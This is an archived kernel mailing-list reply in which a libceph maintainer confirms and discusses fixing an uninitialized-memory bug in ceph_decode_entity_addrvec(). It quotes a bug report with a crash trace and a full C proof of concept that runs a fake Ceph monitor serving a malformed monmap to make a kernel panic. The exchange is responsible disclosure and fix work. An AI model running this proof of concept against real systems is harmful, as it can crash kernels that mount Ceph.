From: Kefu Chai <k.chai@proxmox.com>
To: XIAO WU <xiaowu.417@qq.com>, ceph-devel@vger.kernel.org
Cc: Ilya Dryomov <idryomov@gmail.com>,
Alex Markuze <amarkuze@redhat.com>,
Viacheslav Dubeyko <slava@dubeyko.com>,
linux-kernel@vger.kernel.org
Subject: Re: [PATCH v3] libceph: tolerate addrvecs with multiple entries of the same type
Date: Mon, 22 Jun 2026 22:09:17 +0800 [thread overview]
Message-ID: <87echy650y.fsf@proxmox.com> (raw)
In-Reply-To: <tencent_3A900D10F5E1841A0950F6CAA67897936D09@qq.com>
XIAO WU <xiaowu.417@qq.com> writes:
> Hi Kefu,
>
> I came across a Sashiko AI code review [1] that flagged a pre-existing
> uninitialized memory issue in `ceph_decode_entity_addrvec()`. When the
> addrvec has zero entries (`addr_cnt == 0`), the function returns 0
> without writing to `*addr`, but callers like `ceph_monmap_decode()`
> pass addresses from `kmalloc_flex()` and proceed to use them.
>
hi Xiao,
Thanks for the report and the reproducer. I can confirm it. But I'd
prefer sending the fix separately rather than fold it into v3, as you
pointed out it's pre-existing and independent of my patch.
I took a look at the callers of `ceph_decode_entity_addrvec()`.
Following caller suffers from this issue:
- ceph_monmap_decode() mon_inst[] from kmalloc_flex() (heap)
- ceph_mdsmap_decode() on-stack addr -> m_info[mds].addr
- decode_new_up_state_weight() on-stack addr -> osd_addr[osd]
- ProtocolV2 server_ident on-stack addr, used in memcmp()
osdmap_decode() is the one caller where an empty addrvec is *legitimate*,
and the slot is pre-zeroed with osdmap_set_max_osd(), so it's safe.
> I was able to reproduce this in QEMU by running a fake Ceph monitor that
> sends a monmap with an empty addrvec. With `panic_on_warn=1`, the
> kernel hits a WARNING in `ceph_con_v1_try_read()` and panics.
>
For the commit message / changelog, I'd state the threat model: this
needs a malformed or buggy peer, since legitimate daemons always
advertise at least one addresss -- I checked the current ceph.git to
verify this. But I agree that the connect-to-bogus-addr and panic you
hit does have a concrete impact, as kernel should not panic on malformed
input. this could happen over an unencrypted, signature-unchecked msgr
v1 transport.
For the fix, i'd avoid a defenseive memset() of *addr. as this reminds
me a strncpy which always reset the dest str even if the source str's
length is zero. So I think the right fix is probably to extend the
semantic of `-ENOENT` returned by ceph_decode_entity_addrvec().
Currently, this func returns `-ENOENT` to indicate that "the addrvec has
entries, but none of them is of the wanted type". We can extend to
apply to the emtpy addrvec, so it imply that "no addr of the requested
type". This way, we only need to update osdmap_decode() so it tolerates
-ENOENT.
Ilya, does this direction look right?
>
> On Thu, Jun 11, 2026 at 07:32:51PM +0800, Kefu Chai wrote:
> > ceph_decode_entity_addrvec() currently rejects any addrvec containing
> > more than one entry that matches the requested msgr type...
>
> Your patch correctly tolerates duplicate entries, but the function still
> returns success without touching `*addr` when `addr_cnt == 0`:
>
> ```c
> // net/ceph/decode.c: ceph_decode_entity_addrvec()
> if (!addr_cnt)
> return 0; // *addr is still uninitialized
> if (addr_cnt == 1 && !memchr_inv(&tmp_addr, 0, sizeof(tmp_addr)))
> return 0; // same
> ```
>
> Callers that pass addresses from dynamic allocation hit stale data:
>
> ```c
> // net/ceph/mon_client.c: ceph_monmap_decode()
> mon_inst = kmalloc_flex(..., num_mon, sizeof(*mon_inst));
> // ...
> ceph_decode_entity_addrvec(p, end, msgr2, &mon_inst[i].addr);
> // mon_inst[i].addr may be uninitialized if addrvec was empty
> ```
>
> [Reproduction]
>
> I set up a fake Ceph v1 monitor on localhost that sends a monmap
> containing a monitor entry with an empty addrvec (addr_cnt=0). Mounting
> the Ceph filesystem against it triggers the monmap decode path, causing
> the client to attempt a connection with the uninitialized address.
>
> [Crash — kernel 7.1.0-rc6, panic_on_warn=1]
>
> con->v1.connect_seq != le32_to_cpu(con->v1.in_reply.connect_seq)
> WARNING: net/ceph/messenger_v1.c:901 at
> ceph_con_v1_try_read+0x59f7/0x7020
>
> RIP: 0010:ceph_con_v1_try_read+0x59f7/0x7020
> Call Trace:
> <TASK>
> ceph_con_workfn+0xa04/0x13c0
> process_one_work+0xa20/0x1c50
> worker_thread+0x6df/0xf30
> kthread+0x387/0x4a0
> ret_from_fork+0xb2c/0xdd0
> </TASK>
>
> Kernel panic - not syncing: kernel: panic_on_warn set ...
>
> Full PoC source (poc.c):
> ---8<----------------------------------------------------------------
> /*
> * PoC: Uninitialized memory in ceph_decode_entity_addrvec()
> * Compile: gcc -static -o poc poc.c
> * Run: ./poc [port]
> */
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <sys/socket.h>
> #include <sys/mount.h>
> #include <sys/wait.h>
> #include <sys/stat.h>
> #include <sys/poll.h>
> #include <arpa/inet.h>
> #include <netinet/in.h>
> #include <stdint.h>
> #include <errno.h>
> #include <fcntl.h>
>
> #define BANNER "ceph v027"
> #define BNR 9
> #define ADR 136
> #define CBNR (BNR+ADR)
> #define SBNR (BNR+2*ADR)
>
> #define TAG_RDY 1
> #define TAG_MSG 7
> #define MON_MAP 4
> #define ENT_MON 1
>
> #define MSZ 16384
>
> typedef uint8_t u8; typedef uint16_t u16;
> typedef uint32_t u32; typedef uint64_t u64;
>
> static u32 ct[256];
> static int ci;
>
> static void ic(void)
> {
> u32 i, j, k;
> if (ci) return;
> for (i = 0; i < 256; i++) {
> k = i;
> for (j = 0; j < 8; j++)
> k = (k >> 1) ^ (k & 1 ? 0x82F63B78 : 0);
> ct[i] = k;
> }
> ci = 1;
> }
>
> static u32 crc(u32 c, const u8 *b, int l)
> {
> while (l--) c = ct[(c ^ *b++) & 0xFF] ^ (c >> 8);
> return c;
> }
>
> #define W8(b,v) ((b)[0] = (u8)(v))
> #define W16(b,v) ((b)[0]=(v)&255,(b)[1]=((v)>>8)&255)
> #define W32(b,v)
> ((b)[0]=(v)&255,(b)[1]=((v)>>8)&255,(b)[2]=((v)>>16)&255,(b)[3]=((v)>>24)&255)
> #define W64(b,v) do { int _i; for (_i=0; _i<8; _i++)
> (b)[_i]=((u64)(v)>>(_i*8))&255; } while(0)
>
> #define REQ_FEAT (1ULL << 23)
>
> static int rcv(int f, u8 *b, int l)
> {
> while (l > 0) {
> struct pollfd p = { .fd = f, .events = POLLIN };
> if (poll(&p, 1, 15000) <= 0) return -1;
> int n = read(f, b, l);
> if (n <= 0) return -1;
> b += n; l -= n;
> }
> return 0;
> }
>
> static int snd(int f, u8 *b, int l)
> {
> while (l > 0) { int n = write(f, b, l); if (n <= 0) return -1; b +=
> n; l -= n; }
> return 0;
> }
>
> static int ea(u8 *b) { W8(b, 2); W32(b+1, 0); return 5; }
>
> static int pay(u8 *b)
> {
> int o = 0, bo, so, po, mo, ms;
> bo = o; W32(b+o, 0); o += 4;
> W8(b+o, 6); o++; W8(b+o, 1); o++;
> so = o; W32(b+o, 0); o += 4;
> po = o;
> W64(b+o, 0x42); o += 8;
> W32(b+o, 1); o += 4;
> W8(b+o, 1); o++; W8(b+o, 1); o++; W32(b+o, 0); o += 4;
> W8(b+o, 1); o++; W8(b+o, 1); o++; W32(b+o, 0); o += 4;
> W32(b+o, 1); o += 4;
> W32(b+o, 2); o += 4; memcpy(b+o, "m0", 2); o += 2;
> W8(b+o, 1); o++; W8(b+o, 1); o++;
> mo = o; W32(b+o, 0); o += 4;
> ms = o;
> W32(b+o, 2); o += 4; memcpy(b+o, "m0", 2); o += 2;
> o += ea(b+o);
> W32(b+mo, o - ms);
> W32(b+so, o - po);
> W32(b+bo, o - bo);
> return o;
> }
>
> #define HS 60
> #define FS 13
>
> static int msg(u8 *b, u64 s)
> {
> int o = 0;
> b[o++] = TAG_MSG;
> int h = o;
> memset(b+o, 0, HS); o += HS;
> int pl = pay(b+o); o += pl;
> memset(b+o, 0, FS); o += FS;
> u8 *hh = b + h;
> W64(hh+0, s); W16(hh+16, MON_MAP); W16(hh+18, 127);
> W16(hh+20, 1); W32(hh+22, pl); W64(hh+36, ENT_MON);
> W64(hh+44, 0); W32(hh+56, crc(0, hh, 56));
> return o;
> }
>
> static int mon(int pt)
> {
> int s, c; struct sockaddr_in a; u8 b[MSZ];
> ic();
> s = socket(AF_INET, SOCK_STREAM, 0);
> int o = 1; setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &o, sizeof(o));
> memset(&a, 0, sizeof(a)); a.sin_family = AF_INET;
> a.sin_addr.s_addr = htonl(INADDR_LOOPBACK); a.sin_port = htons(pt);
> bind(s, (void *)&a, sizeof(a)); listen(s, 1);
> struct pollfd p = { .fd = s, .events = POLLIN };
> if (poll(&p, 1, 60000) <= 0) goto out;
> c = accept(s, 0, 0);
>
> if (rcv(c, b, CBNR) < 0) goto done;
> { u8 *p = b; memcpy(p, BANNER, BNR); p += BNR;
> memset(p, 0, ADR); p += ADR; memset(p, 0, ADR);
> if (snd(c, b, SBNR) < 0) goto done; }
> { int t = 0; while (t < 26) {
> struct pollfd p2 = { .fd = c, .events = POLLIN };
> if (poll(&p2, 1, 10000) <= 0) goto done;
> int n = read(c, b+t, MSZ-t); if (n <= 0) goto done; t += n; } }
> memset(b, 0, 26); W8(b, TAG_RDY); W64(b+1, REQ_FEAT);
> snd(c, b, 26); usleep(300000);
> { int ml = msg(b, 1); snd(c, b, ml); }
> usleep(500000);
> { int ml = msg(b, 2); snd(c, b, ml); }
> out:
> close(c); close(s); return 0;
> done:
> close(c); close(s); return -1;
> }
>
> int main(int ac, char **av)
> {
> int pt = 16789; if (ac >= 2) pt = atoi(av[1]);
> pid_t pid = fork();
> if (pid == 0) { mon(pt); _exit(0); }
> usleep(200000);
> mkdir("/tmp/mnt", 0700);
> char s[64]; snprintf(s, 64, "127.0.0.1:%d:/", pt);
> mount(s, "/tmp/mnt", "ceph", 0, "name=admin");
> waitpid(pid, 0, 0);
> umount2("/tmp/mnt", MNT_FORCE); rmdir("/tmp/mnt");
> return 0;
> }
> ---8<----------------------------------------------------------------
> Compile: gcc -static -o poc poc.c
>
> [1]
> https://sashiko.dev/#/patchset/20260611113251.2975975-1-k.chai%40proxmox.com
> (Sashiko AI code review — "Uninitialized Memory", Severity: High)
>
> Thanks,
> XIAOWU
prev parent reply other threads:[~2026-06-22 14:16 UTC|newest]
Thread overview: 11+ messages / expand[flat|nested] mbox.gz Atom feed top
2026-04-23 10:09 [PATCH] libceph: accept addrvecs with multiple entries of the same type Kefu Chai
2026-04-23 10:35 ` Ilya Dryomov
2026-04-23 11:44 ` Kefu Chai
2026-04-24 18:54 ` Ilya Dryomov
2026-04-25 12:56 ` Kefu Chai
2026-05-11 18:11 ` Ilya Dryomov
2026-06-04 14:02 ` [PATCH v2] libceph: tolerate " Kefu Chai
2026-06-04 19:28 ` Viacheslav Dubeyko
2026-06-11 11:32 ` [PATCH v3] " Kefu Chai
2026-06-21 1:29 ` XIAO WU
2026-06-22 14:09 ` Kefu Chai [this message]
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=87echy650y.fsf@proxmox.com \
--to=k.chai@proxmox.com \
--cc=amarkuze@redhat.com \
--cc=ceph-devel@vger.kernel.org \
--cc=idryomov@gmail.com \
--cc=linux-kernel@vger.kernel.org \
--cc=slava@dubeyko.com \
--cc=xiaowu.417@qq.com \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.